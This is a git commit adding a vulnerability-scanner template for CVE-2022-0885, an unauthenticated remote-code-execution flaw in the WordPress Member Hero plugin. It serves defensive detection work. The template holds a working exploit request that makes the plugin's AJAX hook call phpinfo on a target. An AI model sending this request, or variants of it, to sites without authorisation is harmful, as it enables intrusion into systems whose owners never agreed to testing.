Added template for CVE-2022-0885

patch-1
Aman Rawat 2022-10-20 15:14:28 +05:30
parent e906dbd712
commit a8e9e3a16c
1 changed files with 30 additions and 0 deletions

View File

@ -0,0 +1,30 @@
id: CVE-2022-0885
info:
name: WordPress Member Hero plugin <= 1.0.9 - Unauthenticated Remote Code Execution (RCE) vulnerability
author: theamanrawat
severity: critical
description: |
The Member Hero WordPress plugin through 1.0.9 lacks authorization checks, and does not validate the a request parameter in an AJAX action, allowing unauthenticated users to call arbitrary PHP functions with no arguments.
reference:
- https://wpscan.com/vulnerability/8b08b72e-5584-4f25-ab73-5ab0f47412df
- https://wordpress.org/plugins/member-hero/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0885
classification:
cve-id: CVE-2022-0885
metadata:
verified: "true"
tags: wp-plugin,wp,rce,unauth,wpscan,cve2022,wordpress,cve,member-hero
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo"
matchers:
- type: word
part: body
words:
- '<a href="http://www.php.net/">'
- 'phpinfo()'
condition: and